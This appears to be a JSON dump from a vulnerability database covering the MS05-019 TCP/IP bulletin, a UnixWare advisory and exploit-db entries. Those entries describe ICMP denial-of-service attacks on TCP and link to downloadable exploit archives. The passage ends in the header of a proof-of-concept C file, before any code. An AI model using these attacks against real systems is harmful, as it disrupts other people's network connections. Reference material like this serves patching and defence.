To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows XP Home Edition Service Pack 1, Windows XP Professional Service Pack 1, Windows XP Tablet PC Edition, Windows XP Media Center Edition, Windows XP Home Edition Service Pack 2, Windows XP Professional Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows XP Media Center Edition 2005:\r\nFile Name\tVersion\tDate\tTime\tSize\tFolder\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.1.2600.1630\r\n\t\r\n\r\n23-Feb-2005\r\n\t\r\n\r\n02:00\r\n\t\r\n\r\n339,968\r\n\t\r\n\r\nSP1QFE\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.1.2600.2631\r\n\t\r\n\r\n14-Mar-2005\r\n\t\r\n\r\n00:55\r\n\t\r\n\r\n359,808\r\n\t\r\n\r\nSP2GDR\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.1.2600.2631\r\n\t\r\n\r\n14-Mar-2005\r\n\t\r\n\r\n01:17\r\n\t\r\n\r\n359,936\r\n\t\r\n\r\nSP2QFE\r\n\r\nUpdspapi.dll\r\n\t\r\n\r\n6.1.22.4\r\n\t\r\n\r\n25-Feb-2005\r\n\t\r\n\r\n03:35\r\n\t\r\n\r\n371,936\r\n\t\r\n\r\nWindows XP 64-Bit Edition Service Pack 1 (Itanium):\r\nFile Name\tVersion\tDate\tTime\tSize\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.1.2600.1630\r\n\t\r\n\r\n23-Feb-2005\r\n\t\r\n\r\n00:36\r\n\t\r\n\r\n1,111,040\r\n\r\nUpdspapi.dll\r\n\t\r\n\r\n6.1.22.4\r\n\t\r\n\r\n25-Feb-2005\r\n\t\r\n\r\n02:50\r\n\t\r\n\r\n639,712\r\n\r\nWindows XP 64-Bit Edition Version 2003 (Itanium):\r\nFile Name\tVersion\tDate\tTime\tSize\tFolder\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.2.3790.290\r\n\t\r\n\r\n17-Mar-2005\r\n\t\r\n\r\n03:57\r\n\t\r\n\r\n973,824\r\n\t\r\n\r\nRTMGDR\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.2.3790.290\r\n\t\r\n\r\n17-Mar-2005\r\n\t\r\n\r\n03:57\r\n\t\r\n\r\n977,408\r\n\t\r\n\r\nRTMQFE\r\n\r\nUpdspapi.dll\r\n\t\r\n\r\n6.1.22.4\r\n\t\r\n\r\n11-Mar-2005\r\n\t\r\n\r\n17:56\r\n\t\r\n\r\n639,712\r\n\t\r\n\r\nNotes The Windows XP security update is packaged as a dual-mode package. 
Dual-mode packages contain files for the original version of Windows XP Service Pack 1 (SP1) and files for Windows XP Service Pack 2 (SP2).\r\n\r\nFor more information about dual-mode packages, see Microsoft Knowledge Base Article 328848.\r\n\r\nWhen you install these security updates, the installer checks to see if one or more of the files that are being updated on your system have previously been updated by a Microsoft hotfix.\r\nIf you have previously installed a hotfix to update an affected file, one of the following conditions occurs, depending on your operating system:\r\n\u2022\t\r\n\r\nWindows XP SP2\r\n\r\nThe installer copies the SP2QFE files to your system.\r\n\u2022\t\r\n\r\nWindows XP 64-Bit Edition Version 2003 (Itanium)\r\n\r\nThe installer copies the RTMQFE files to your system.\r\n\r\nIf you have not previously installed a hotfix to update an affected file, one of the following conditions occurs, depending on your operating system:\r\n\u2022\t\r\n\r\nWindows XP SP2\r\n\r\nThe installer copies the SP2GDR files to your system.\r\n\u2022\t\r\n\r\nWindows XP 64-Bit Edition Version 2003 (Itanium)\r\n\r\nThe installer copies the RTMGDR files to your system.\r\n\r\nFor more information about this behavior, see Microsoft Knowledge Base Article 824994.\r\n\r\nFor more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nFor more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nNote For Windows XP 64-Bit Edition Version 2003 (Itanium), this security update is the same as the Windows Server 2003 for Itanium-based Systems security update.\r\n\r\nVerifying that the Update Has Been Applied\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. 
MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n\u2022\t\r\n\r\nFile Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Search.\r\n\r\n2.\r\n\t\r\n\r\nIn the Search Results pane, click All files and folders under Search Companion.\r\n\r\n3.\r\n\t\r\n\r\nIn the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n\r\n4.\r\n\t\r\n\r\nIn the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n5.\r\n\t\r\n\r\nOn the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. 
If the file or version information is not present, use one of the other available methods to verify update installation.\r\n\u2022\t\r\n\r\nRegistry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nFor Windows XP Home Edition Service Pack 1, Windows XP Professional Service Pack 1, Windows XP Tablet PC Edition, Windows XP Media Center Edition, Windows XP Home Edition Service Pack 2, Windows XP Professional Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows XP Media Center Edition 2005:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP3\KB893066\Filelist\r\n\r\nFor Windows XP 64-Bit Edition Version 2003 (Itanium):\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Server 2003\SP1\KB893066\Filelist\r\n\r\nNote These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 893066 security update into the Windows installation source files.\r\n\r\n\t\r\nWindows 2000 (all versions)\r\n\r\nPrerequisites\r\nFor Windows 2000, this security update requires Service Pack 3 (SP3) or Service Pack 4 (SP4). For Small Business Server 2000, this security update requires Small Business Server 2000 Service Pack 1a or Small Business Server 2000 running with Windows 2000 Server Service Pack 4.\r\n\r\nThe software that is listed has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. 
To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nFor more information about how to obtain the latest service pack, see Microsoft Knowledge Base Article 260910.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\nSupported Security Update Installation Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode - same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDo not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestart the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (Default is 30 sec). 
Intended for use with either /quiet or /passive switches.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/overwriteoem\r\n\t\r\n\r\nOverwrite OEM files without prompting\r\n\r\n/nobackup\r\n\t\r\n\r\nDo not backup files needed for uninstall\r\n\r\n/forceappsclose\r\n\t\r\n\r\nForce other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllow the redirection of installation log files\r\n\r\n/integrate:path\r\n\t\r\n\r\nIntegrates the update into the Windows source files located at the path specified\r\n\r\n/extract[:path]\r\n\t\r\n\r\nExtracts files without starting the Setup program\r\n\r\n/ER\r\n\t\r\n\r\nEnable extended error reporting\r\n\r\n/verbose\r\n\t\r\n\r\nEnables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site. 
For more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows 2000 Service Pack 3 and Windows 2000 Service Pack 4:\r\n\r\nWindows2000-kb893066-x86-enu /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows 2000 Service Pack 3 and Windows 2000 Service Pack 4:\r\n\r\nWindows2000-kb893066-x86-enu /norestart\r\n\r\nFor more information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nYou must restart your system after you apply this security update.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB893066$\Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\nSupported Spuninst.exe Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes \t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended setup mode. No user interaction is required, but installation status is displayed. 
If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode - same as unattended setup mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDo not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestart the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (Default is 30 sec). Intended for use with either /quiet or /passive switches.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/forceappsclose\r\n\t\r\n\r\nForce other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. 
To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows 2000 Service Pack 3, Windows 2000 Service Pack 4, and Small Business Server 2000:\r\nFile Name\tVersion\tDate\tTime\tSize\r\n\r\nAfd.sys\r\n\t\r\n\r\n5.0.2195.6687\r\n\t\r\n\r\n19-Jun-2003\r\n\t\r\n\r\n19:05\r\n\t\r\n\r\n120,240\r\n\r\nMsafd.dll\r\n\t\r\n\r\n5.0.2195.6602\r\n\t\r\n\r\n19-Jun-2003\r\n\t\r\n\r\n19:05\r\n\t\r\n\r\n108,816\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.0.2195.7035\r\n\t\r\n\r\n27-Feb-2005\r\n\t\r\n\r\n02:05\r\n\t\r\n\r\n336,560\r\n\r\nTdi.sys\r\n\t\r\n\r\n5.0.2195.6655\r\n\t\r\n\r\n19-Jun-2003\r\n\t\r\n\r\n19:05\r\n\t\r\n\r\n16,240\r\n\r\nWshtcpip.dll\r\n\t\r\n\r\n5.0.2195.6601\r\n\t\r\n\r\n19-Jun-2003\r\n\t\r\n\r\n19:05\r\n\t\r\n\r\n17,680\r\n\r\nUpdspapi.dll\r\n\t\r\n\r\n6.1.22.4\r\n\t\r\n\r\n25-Feb-2005\r\n\t\r\n\r\n16:43\r\n\t\r\n\r\n371,936\r\n\r\nVerifying that the Update Has Been Applied\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n\u2022\t\r\n\r\nFile Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. 
If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Search.\r\n\r\n2.\r\n\t\r\n\r\nIn the Search Results pane, click All files and folders under Search Companion.\r\n\r\n3.\r\n\t\r\n\r\nIn the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n\r\n4.\r\n\t\r\n\r\nIn the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n5.\r\n\t\r\n\r\nOn the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n\u2022\t\r\n\r\nRegistry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry key:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP5\KB893066\Filelist\r\n\r\nNote This registry key may not contain a complete list of installed files. 
Also, this registry key may not be created correctly when an administrator or an OEM integrates or slipstreams the 893066 security update into the Windows installation source files.\r\n\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nSong Liu, Hongzhen Zhou, and Neel Mehta of ISS X-Force for reporting the IP Validation Vulnerability (CAN-2005-0048).\r\n\u2022\t\r\n\r\nFernando Gont of Argentina's Universidad Tecnologica Nacional/Facultad Regional Haedo, for working with us responsibly on the ICMP Connection Reset Vulnerability (CAN-2004-0790) and the ICMP Path MTU Vulnerability (CAN-2004-1060).\r\n\u2022\t\r\n\r\nQualys for reporting the ICMP Path MTU Vulnerability (CAN-2004-1060).\r\n\r\nObtaining Other Security Updates:\r\n\r\nUpdates for other security issues are available at the following locations:\r\n\u2022\t\r\n\r\nSecurity updates are available in the Microsoft Download Center. You can find them most easily by doing a keyword search for "security_patch."\r\n\u2022\t\r\n\r\nUpdates for consumer platforms are available at the Windows Update Web site.\r\n\r\nSupport:\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. 
For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nSecurity Resources:\r\n\u2022\t\r\n\r\nThe Microsoft TechNet Security Web site provides additional information about security in Microsoft products.\r\n\u2022\t\r\n\r\nMicrosoft Software Update Services\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer (MBSA)\r\n\u2022\t\r\n\r\nWindows Update \r\n\u2022\t\r\n\r\nWindows Update Catalog: For more information about the Windows Update Catalog, see Microsoft Knowledge Base Article 323166.\r\n\u2022\t\r\n\r\nOffice Update \r\n\r\nSoftware Update Services:\r\n\r\nBy using Microsoft Software Update Services (SUS), administrators can quickly and reliably deploy the latest critical updates and security updates to Windows 2000 and Windows Server 2003-based servers, and to desktop systems that are running Windows 2000 Professional or Windows XP Professional.\r\n\r\nFor more information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site.\r\n\r\nSystems Management Server:\r\n\r\nMicrosoft Systems Management Server (SMS) delivers a highly-configurable enterprise solution for managing updates. By using SMS, administrators can identify Windows-based systems that require security updates and can perform controlled deployment of these updates throughout the enterprise with minimal disruption to end users. For more information about how administrators can use SMS 2003 to deploy security updates, visit the SMS 2003 Security Patch Management Web site. SMS 2.0 users can also use Software Updates Service Feature Pack to help deploy security updates. For information about SMS, visit the SMS Web site.\r\n\r\nNote SMS uses the Microsoft Baseline Security Analyzer and the Microsoft Office Detection Tool to provide broad support for security bulletin update detection and deployment. Some software updates may not be detected by these tools. 
Administrators can use the inventory capabilities of the SMS in these cases to target updates to specific systems. For more information about this procedure, visit the following Web site. Some security updates require administrative rights following a restart of the system. Administrators can use the Elevated Rights Deployment Tool (available in the SMS 2003 Administration Feature Pack and in the SMS 2.0 Administration Feature Pack) to install these updates.\r\n\r\nDisclaimer:\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\u2022\t\r\n\r\nV1.0 (April 12, 2005): Bulletin published", "edition": 1, "cvss3": {}, "published": "2005-04-13T00:00:00", "title": "Microsoft Security Bulletin MS05-019 Vulnerabilities in TCP/IP Could Allow Remote Code Execution and Denial of Service (893066)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2005-0048", "CVE-2004-0230", "CVE-2005-0688", "CVE-2004-1060"], "modified": "2005-04-13T00:00:00", "id": "SECURITYVULNS:DOC:8310", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8310", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:13", "description": "Release Date: 2005-09-05 \r\n\r\n \r\nCritical: \r\nLess critical \r\nImpact: DoS\r\n \r\nWhere: From remote\r\n \r\nSolution Status: Vendor Patch \r\n\r\n \r\nOS: UnixWare 7.x.x\r\n\r\n \r\n Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it. \r\n\r\n \r\nCVE reference: CAN-2004-0790\r\nCAN-2004-0791\r\nCAN-2004-1060\r\nCAN-2005-0065\r\nCAN-2005-0066\r\nCAN-2005-0067\r\nCAN-2005-0068\r\n \r\n\r\n \r\nDescription:\r\nSCO has issued an update for UnixWare. 
This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) on an active TCP session.\r\n\r\nFor more information:\r\nSA14904\r\n\r\nSolution:\r\nApply updated packages.\r\n\r\nUnixWare 7.1.3:\r\nftp://ftp.sco.com/pub/updates/Un...SA-2005.36/erg712758.uw713.pkg.Z\r\n84c7d2f7e133f39ec15fceed717f080b\r\n\r\nUnixWare 7.1.4:\r\nftp://ftp.sco.com/pub/updates/Un...SA-2005.36/erg712758.uw714.pkg.Z\r\n85e314659d3ca5a2e887a91ebd71f4cc\r\n\r\nOriginal Advisory:\r\nftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.36/SCOSA-2005.36.txt\r\n\r\nOther References:\r\nSA14904:\r\nhttp://secunia.com/advisories/14904/\r\n \r\n", "edition": 1, "cvss3": {}, "published": "2005-09-05T00:00:00", "title": "UnixWare ICMP Message Handling Denial of Service", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-0066", "CVE-2004-0791", "CVE-2005-0065", "CVE-2004-0790", "CVE-2005-0068", "CVE-2005-0067", "CVE-2004-1060"], "modified": "2005-09-05T00:00:00", "id": "SECURITYVULNS:DOC:9653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9653", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2022-01-13T06:23:17", "description": "", "cvss3": {}, "published": "2005-04-12T00:00:00", "type": "exploitdb", "title": "Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", 
"CVE-2004-0791", "CVE-2004-1060", "2004-0791"], "modified": "2005-04-12T00:00:00", "id": "EDB-ID:25387", "href": "https://www.exploit-db.com/exploits/25387", "sourceData": "source: https://www.securityfocus.com/bid/13124/info\r\n\r\nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\r\n\r\nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\r\n\r\nReportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\r\n\r\nThe following individual attacks are reported:\r\n\r\n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\r\n\r\nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\r\n\r\n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\r\n\r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n\r\n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. 
The Mitre ID CAN-2004-1060 is assigned to this issue.\r\n\r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n\r\n**Update: Microsoft platforms are also reported prone to these issues. \r\n\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25387.tar.gz", "sourceHref": "https://www.exploit-db.com/download/25387", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-13T06:23:17", "description": "", "cvss3": {}, "published": "2005-04-12T00:00:00", "type": "exploitdb", "title": "Multiple Vendor ICMP Message Handling - Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "2004-0790"], "modified": "2005-04-12T00:00:00", "id": "EDB-ID:25389", "href": "https://www.exploit-db.com/exploits/25389", "sourceData": "source: https://www.securityfocus.com/bid/13124/info\r\n \r\nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\r\n \r\nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\r\n \r\nReportedly, the RFC doesn't recommend security checks for ICMP error messages. 
As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\r\n \r\nThe following individual attacks are reported:\r\n \r\n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\r\n \r\n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. 
The Mitre ID CAN-2004-1060 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n**Update: Microsoft platforms are also reported prone to these issues.\r\n \r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25389.tar.gz", "sourceHref": "https://www.exploit-db.com/download/25389", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-13T06:23:17", "description": "", "cvss3": {}, "published": "2005-04-12T00:00:00", "type": "exploitdb", "title": "Multiple Vendor ICMP Implementation - Malformed Path MTU Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "2004-1060"], "modified": "2005-04-12T00:00:00", "id": "EDB-ID:25388", "href": "https://www.exploit-db.com/exploits/25388", "sourceData": "source: https://www.securityfocus.com/bid/13124/info\r\n \r\nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\r\n \r\nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\r\n \r\nReportedly, the RFC doesn't recommend security checks for ICMP error messages. 
As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\r\n \r\nThe following individual attacks are reported:\r\n \r\n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\r\n \r\n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n**Update: Microsoft platforms are also reported prone to these issues. 
\r\n\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25388.tar.gz", "sourceHref": "https://www.exploit-db.com/download/25388", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-13T07:14:24", "description": "", "cvss3": {}, "published": "2005-04-20T00:00:00", "type": "exploitdb", "title": "Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service (MS05-019)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "2004-0790"], "modified": "2005-04-20T00:00:00", "id": "EDB-ID:948", "href": "https://www.exploit-db.com/exploits/948", "sourceData": "/* HOD-icmp-attacks-poc.c: 2005-04-15: PUBLIC v.0.2\r\n*\r\n* Copyright (c) 2004-2005 houseofdabus.\r\n*\r\n* (MS05-019) (CISCO:20050412)\r\n* ICMP attacks against TCP (Proof-of-Concept)\r\n*\r\n*\r\n*\r\n* .::[ houseofdabus ]::.\r\n*\r\n*\r\n*\r\n* [ for more details:\r\n* [ http://www.livejournal.com/users/houseofdabus\r\n* ---------------------------------------------------------------------\r\n* Systems Affected:\r\n* - Cisco Content Services Switch 11000 Series (WebNS)\r\n* - Cisco Global Site Selector (GSS) 4480 1.x\r\n* - Cisco IOS 10.x\r\n* - Cisco IOS 11.x\r\n* - Cisco IOS 12.x\r\n* - Cisco IOS R11.x\r\n* - Cisco IOS R12.x\r\n* - Cisco IOS XR 